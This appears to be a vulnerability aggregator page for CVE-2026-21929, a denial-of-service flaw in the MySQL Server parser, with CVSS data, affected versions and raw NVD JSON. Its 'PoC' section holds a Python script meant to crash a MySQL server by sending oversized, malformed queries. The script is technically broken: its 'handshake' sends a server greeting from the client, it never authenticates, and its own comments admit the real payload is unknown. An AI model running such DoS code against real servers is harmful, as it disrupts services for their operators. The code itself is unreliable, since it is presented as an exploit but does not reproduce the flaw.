Security Vulnerability Report
中文
CVE-2026-21929 CVSS 5.3 MEDIUM

CVE-2026-21929

Published: 2026-01-20 22:15:55
Last Modified: 2026-01-29 15:45:40
Source: [email protected]

Description

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 9.0.0-9.5.0. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:* - VULNERABLE
Oracle MySQL Server 9.0.0
Oracle MySQL Server 9.1.0
Oracle MySQL Server 9.2.0
Oracle MySQL Server 9.3.0
Oracle MySQL Server 9.4.0
Oracle MySQL Server 9.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-21929 PoC - Oracle MySQL Server Parser DoS Note: This PoC is for educational purposes only """ import socket import struct import time def mysql_handshake(sock, username): """Perform MySQL authentication handshake""" # Send initial handshake packet packet = b'\x0a\x00\x00\x00\x0d\x00\x00\x00' packet += b'MySQL\x00' # Server version packet += b'\x00' * 50 # Padding sock.send(packet) # Receive handshake response data = sock.recv(1024) return True def send_malicious_query(sock, query): """Send potentially malicious SQL query""" # MySQL packet header (3 bytes length + 1 byte sequence) payload = query.encode('utf-8') length = len(payload) # Construct packet with sequence number 1 packet = struct.pack('<I', length)[:3] packet += b'\x01' # Sequence ID packet += payload sock.send(packet) # Wait for response time.sleep(2) try: response = sock.recv(4096) return len(response) > 0 except: return False def exploit_cve_2026_21929(host, port, username, password): """ Attempt to trigger CVE-2026-21929 Parser DoS vulnerability Note: Actual PoC requires knowledge of specific malformed SQL """ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) try: sock.connect((host, port)) mysql_handshake(sock, username) # Malformed SQL that triggers Parser component # The exact payload depends on specific vulnerability details malicious_queries = [ "SELECT * FROM users WHERE id = 1 AND " + "a" * 10000 + "=b", "SELECT /* nested */ /* comment */ * FROM table1 WHERE col1 = 'test" + "'" * 500, ] for query in malicious_queries: result = send_malicious_query(sock, query) if not result: print(f"[+] Query triggered DoS condition: {query[:50]}...") return True return False except Exception as e: print(f"[-] Error: {e}") return False finally: sock.close() if __name__ == "__main__": print("CVE-2026-21929 MySQL Parser DoS PoC") print("Usage: python3 poc.py <host> <port> <username> <password>") print("WARNING: For authorized testing only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21929", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:55.410", "lastModified": "2026-01-29T15:45:39.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Parser). Supported versions that are affected are 9.0.0-9.5.0. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H)."}, {"lang": "es", "value": "Vulnerabilidad en el producto MySQL Server de Oracle MySQL (componente: Servidor: Analizador sintáctico). Las versiones compatibles que están afectadas son 9.0.0-9.5.0. Vulnerabilidad difícil de explotar permite a un atacante con pocos privilegios con acceso a la red a través de múltiples protocolos comprometer MySQL Server. Ataques exitosos de esta vulnerabilidad pueden resultar en la capacidad no autorizada de causar un bloqueo o un fallo repetible con frecuencia (DoS completo) de MySQL Server. Puntuación base CVSS 3.1 de 5.3 (Impactos en la disponibilidad). Vector CVSS: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:mysql_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndIncluding": "9.5.0", "matchCriteriaId": "80A941A0-B16F-477B-9062-EF768F4CAAD4"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.